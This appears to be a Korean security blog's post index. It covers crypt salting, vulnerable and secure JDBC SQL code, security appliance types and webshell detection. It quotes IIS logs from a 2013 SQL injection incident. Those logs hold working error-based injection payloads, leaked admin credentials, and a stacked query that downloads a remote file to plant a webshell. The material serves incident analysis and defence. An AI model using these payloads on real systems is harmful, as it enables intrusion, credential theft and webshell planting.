'분류 전체보기'에 해당되는 글 195건

소금을 치다라는 뜻을 가진 salt  로 유닉스 패스워드의 경우 동일한 암호를 입력해도

shadow에서 다르게 보인다.

레인보우 테이블? hash 테이블에 대한 저항성을 가진다.

암호 알고리즘에 대한 저항성인 collision과는 연관이 없다.

encrypt('abc')     

pVPHn3wOMFC8.

앞자리 두 자리가 salt이다.

http://coffeenix.net/doc/php-4.2.3/ko/function.crypt.html

zest-0.5.zip

OWASP ZAP에서 zest.sh를 활용한 취약점 점검

취약한 코딩 Statement

Statement stmt = conn.createStatement();
ResultSet rs =  stmt.executeQuery("select count(*) as cnt from member where userid='"+userid+"' and password='"+password+"'");

시큐어 코딩 Prepared Statement

PreparedStatement stmt = conn.prepareStatement("select count(*) from member where userid=? and password=?");
stmt.setString(1, userid);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();

잘못된 시큐어 코딩 Prepared Statement

PreparedStatement stmt =  conn.prepareStatement("select count(*) from member where userid='" + userid + "'" and password='" + password + "'");

PreparedStatement  사용하면 메모리에서 파라메터가 바인딩 될때 실행이 되지 않게 ''감싸지게 되는데 +로 저렇게 구현하면 물음표(?)가 아니라서 감싸지지 않는다.

sql injection 공격은 한번에 성공 시키기가 힘들다. 테이블명과 칼럼명을 에러코드를 보고 유추 해야 된다. 그래서 해당 취약점으로 침해사고 발생시 http error code 500을 검색 하면 된다.

2013-05-31 07:09:28 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%203%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'superadmin^superadmin^최상위_관리자'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 115
2013-05-31 07:09:29 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%204%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'test^123456^_'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 117
2013-05-31 07:09:29 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%205%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'wonny0125^wonny0125^임원근'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 113
2013-05-31 07:06:15 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20;declare%20@b%20varbinary(8000),@hr%20int,@http%20int,@down%20int%20exec%20sp_oacreate%20[microsoft.xmlhttp],@http%20output%20exec%20@hr%20=%20sp_oamethod%20@http,[open],null,[get],[http://sms.garosu.com/i/i/db.txt],0%20exec%20@hr%20=%20sp_oamethod%20@http,[send],null%20exec%20@hr=sp_oagetproperty%20@http,[responsebody],@b%20output%20exec%20@hr=sp_oacreate%20[adodb.stream],@down%20output%20exec%20@hr=sp_oasetproperty%20@down,[type],1%20exec%20@hr=sp_oasetproperty%20@down,[mode],3%20exec%20@hr=sp_oamethod%20@down,[open],null%20exec%20@hr=sp_oamethod%20@down,[write],null,@b%20exec%20@hr=sp_oamethod%20@down,[savetofile],null,[d:%5Cweb%5Cweb_targetdomain2011%5Cdp.asp],1%20;-- 80 - 114.207.246.162 200 0 0 344

yara-17-win32.zip

Windows yara 1.7

정말 가끔 유용하게 필요한 경우가 있다.

HTML5 활용 2010년도 만들었던 자료다.  

HTML5 활용.pptx

현 추세는 UTM->ESM->SIEMs->TMS로 가는 추세이고, PC단과 서버단을 분리하여 운영하고 있는 추세이다.

TMS(Threat Management System)

위협관리시스템으로 원격 IDS로 생각하면 편하다. 패턴과 시그니처에 대해 Manager->Agent로 일괄 배포도 가능하다. 원격관제를 할때 주로 사용 된다.

ESM(Enterprise Security Managemnt)

통합보안관리 시스템이다. 웹방화벽, IDS, 웹서버, DDoS 전용장비들의 이벤트들을 모아 위협정보에 대한 판단을 실시한다. 여러가지 이벤트들을 모아서 만들다 보니 부하가 많을경우 퍼포먼스나 속도에 대해 문제가 심각하다. 그래서 부하가 많은 경우 실시간으로 탐지를 못하고 미러링하여 차후 분석을 진행하기도 한다.

UTM(Unified Threat Management)

말도 많고 탈도 많은 녀석이다. 보통 보안관제는 사람이 하면서 장비는 서버단과 PC단을 나누어서 진행하는데 이 장비는 그런것들을 통합 한것이다.단순히 3.20 7.7처럼 대형 DDoS의좀비PC가 설치 되었을때 해당 장비에서 해당 PC를 찾아서 네트워크를 차단해 버리고, C&C ip와 악성코드 배포 ip를 격리시켜 버린다. 하지만 오탐도 많고, 장비들의 한계점을 서로 상호보안하며 운영을 하여야 되는데 좀 몰빵된 느낌이 강하다.

SIEMs(security information and event management solutions)

심스는 UTM+ESM 조금 더 발전시킨 케이스로 원격관제가 가능한 방법이다.이식성인 장비들을 SI로 묶은 감이 있어서 호환성에 조금 문제가 있다. 

VPN(virtual private network)

IP물리적으로 분리된 대상과 암호하된 통신을 위한 장비 인증, 캡슬화 (암호화 전송) 전용선에 비해 가격이 싼게 장점

방화벽 FireWall

IP(L3)/ PORT(L4)단의 룰셋 설정가능 리눅스의 iptables과 윈도우의 ipsec기능과 동일 하나의 장비로 존재하여 운용 공격자 IP나 불필요한 포트 차단

IPS/IDS

침입차단 시스템IPS  IDS+F/W= IPS
침입탐지 시스템IDS  snort룰 기반으로 패턴을 대입하여 시스템 공격에 대한 탐지 및 차단을 주로 병행(ftp, ssh 등)

웹방화벽(Web Application Firewall)

웹 공격에 대해서 IPS에 패턴이 있더라도 장비의 한계치 때문에 웹방화벽에서 Application 단은 정밀 분석 https 트래픽 분석하기 위해 인증서 설치 가능 패턴 업데이트 시 Appscan 업데이트 패턴을 보고 주로 반영 Appscan에서 진단하는 모든 패턴을 거의 탐지
(웹쉘, sql injection, xss, apache struct2 등 탐지)

DDoS 전용 장비

DDOS 공격에 대한 패킷 필터링 장비 임계치 설정 가능

L4 스위치

IP와 PORT 기준의 로드벨런스 예) client IP가 홀수인 경우 A장비로 짝수인 경우 B장비 설정

L7스위치

Application(L7)별로 로드 벨런스
웹서버나 WAS서버의 세션 임계치를 두어 세션이 적은곳에 뿌려줌
URL별로 파싱하여 서비스 가능
Https 와일드 카드(*)인증서 설치 가능

라우터

백본 흔히 라우터라고 불리는것은 좀 큰 개념인데 망내에서는 그 망의 게이트웨이나 IP를 총괄 하는 백본과 동일한 의미로 사용

보안 관제 입장에서 악성코드 대응 방법에 대해 작성한 것이다.

악성코드가 실제로 100이라면 글에서 30정도 밖에 표현을 못한거 같다. 지금 생각해보면 좀 많이 부끄러운 문서다.

Malware분석및대응0.7.pdf

웹쉘패턴분석및대응.pdf

bwsfinder.zip

바라미형이 만들어 놓은 오픈소스에 패턴을 업데이트 하여 좀 쓸만하게 만들었었다. 

실 운영서버에서 점검시 시간이 굉장히 많이 걸린다. 파일 하나 하나 당 정규식으로 패턴에 다 대입 해보기 때문이다. 서버가 운영중이라면 자원의 상태도 중요하다. 그리고 속도가 느리다고 함부로 멀티 쓰레드로 수정하지 말자. python으로 멀티 쓰레드로 돌리다 cpu태워 먹은적도 있다. 자원 소모가 심해서 자주 사용하긴 조금 힘들듯 하다. 그리고 현재 웹쉘 탐지 상용솔루션도 Agent설치시 메모리를 많이 잡아 먹는다.

 SSO가 설치된 경우 Policy 서버에서 해당 쿠키에 대한 검증을 실시하여 CSRF 방어  Policy 서버에서는 최초 로그인시 클라이언트의 IP를 기록한 후 클라이언트가 서버를 이동할때 마다 소켓통신으로 해당 쿠키가 사용 가능한지 체크 후 인증 

[그림 1-1]